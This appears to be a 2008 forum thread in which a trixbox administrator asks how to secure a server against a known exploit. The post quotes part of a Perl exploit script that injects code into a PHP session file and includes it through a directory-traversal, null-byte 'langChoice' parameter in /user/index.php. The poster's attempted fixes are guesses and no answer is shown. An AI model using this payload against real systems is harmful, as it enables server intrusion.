tribox problem

adv · August 7, 2008

hello i have tribox installed and recently i found out that there is an exploit with connect-back that u can get access to the server

the problem is in the /user/index.php

i found out the exploit and its made in perl

usage() unless @ARGV;
my $url = "http://$ARGV[0]/user/index.php";
my $ua = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
$ua->cookie_jar($cookie_jar);

menu();

sub execScript{
    my $scriptCode = shift;
    post($scriptCode);
    my $phpsessionid = extractPHPSID($cookie_jar->as_string);
    post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00");
}

its getting access to /tmp .. ive tried to chmod 755 /tmp but the index doesnt work it gives an error

<?php

apache_setenv('QUERY_STRING',$_SERVER["QUERY_STRING"] = addslashes(strip_tags(urldecode($_SERVER["QUERY_STRING"]))));
apache_setenv('REQUEST_URI',$_SERVER["REQUEST_URI"] = addslashes(strip_tags(urldecode($_SERVER["REQUEST_URI"]))));
ini_set("error_reporting","E_ALL & ~E_NOTICE");
        //session_start();
        require 'includes/smartysetup.php';
 require_once("includes/xajax.inc.php");
        include "includes/tbversion.php"; // Grabs version of TrixBox from file /etc/trixbox/trixbox-version
        $smarty->assign("tbversion",tbversion());
        $smarty->assign("title","trixbox - User Mode");
...
?>

ive tried to to comment sesion_start(); it works but does it gives any problems?

how to i secure it to keep hackers out?

adv · August 8, 2008

hello .. plz anybody?? :|

adv · August 16, 2008

sorry about the topic : i ment to be " trixbox problem "

and doesnt anybody know what to do ?

how do i secure ittt

Sign In

tribox problem

Recommended Posts

adv

Link to comment

Share on other sites

adv

Link to comment

Share on other sites

adv

Link to comment

Share on other sites

Archived

Browse

Activity

Important Information